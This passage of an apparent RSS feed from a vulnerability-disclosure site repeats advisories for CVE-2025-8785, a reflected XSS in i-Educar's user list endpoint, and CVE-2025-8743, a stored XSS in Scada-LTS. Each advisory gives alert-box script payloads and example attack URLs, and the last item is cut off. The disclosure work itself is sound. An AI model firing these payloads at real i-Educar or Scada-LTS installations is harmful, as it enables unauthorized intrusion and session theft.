&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 09 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8785</title>
        <link>https://www.cvehunters.com/p/cve-2025-8785/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8785/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8785-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-8785: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8785/image.png&amp;#34;
	width=&amp;#34;854&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;106&amp;#34;
		data-flex-basis=&amp;#34;256px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;example-urls&amp;#34;&amp;gt;Example URLs:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8785-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-8785: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8785/image.png&amp;#34;
	width=&amp;#34;854&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;106&amp;#34;
		data-flex-basis=&amp;#34;256px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;example-urls&amp;#34;&amp;gt;Example URLs:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?matricula=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?matricula_interna=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 09 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8743</title>
        <link>https://www.cvehunters.com/p/cve-2025-8743/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8743/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8743-cross-site-scripting-xss-stored-endpoint-data_source_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-8743: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8743-cross-site-scripting-xss-stored-endpoint-data_source_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-8743: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8743/image.png&amp;#34;
	width=&amp;#34;835&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8743/image_hu_1f6a33a750e3183c.png 480w, /p/cve-2025-8743/image_hu_3bb6ae9b4cbb06a1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 08 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8538</title>
        <link>https://www.cvehunters.com/p/cve-2025-8538/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8538/</guid>
